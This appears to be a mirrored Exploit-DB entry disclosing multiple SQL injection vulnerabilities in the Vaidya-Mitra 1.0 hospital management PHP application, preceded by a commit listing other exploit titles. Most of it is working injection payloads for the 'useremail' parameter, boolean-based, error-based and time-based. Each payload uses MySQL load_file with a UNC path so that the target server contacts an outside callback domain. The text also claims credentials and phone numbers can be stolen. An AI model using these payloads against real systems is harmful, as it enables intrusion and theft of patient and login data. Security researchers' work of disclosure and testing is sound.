bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51596.txt
Exploit-DB 3a3c03321c DB: 2023-07-20 
18 changes to exploits/shellcodes/ghdb

Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

ABB FlowX v4.00 - Exposure of Sensitive Information

TP-Link TL-WR740N - Authenticated Directory Transversal

Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
Blackcat Cms v1.4 - Remote Code Execution (RCE)
Blackcat Cms v1.4 - Stored XSS
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

phpfm v1.7.9 - Authentication type juggling

PimpMyLog v1.7.14 - Improper access control

PMB 7.4.6 - SQL Injection

Statamic 4.7.0 - File-Inclusion

Vaidya-Mitra 1.0 - Multiple SQLi
2023-07-20 00:16:46 +00:00

65 lines
No EOL
2.6 KiB
Text
Raw Permalink Blame History

## Title: Vaidya-Mitra 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free:
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,
https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `useremail` parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'
was submitted in the useremail parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker easily can steal all information from this
system, like
login credentials, phone numbers and etc.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: useremail (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
RLIKE (SELECT (CASE WHEN (5532=5532) THEN
0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select
load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+''
ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT
(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
'gHln'='gHln&userpassword=rootadmin
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND
'ZWBa'='ZWBa&userpassword=rootadmin
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)
## Time spend:
00:27:00
Reference in a new issue View git blame Copy permalink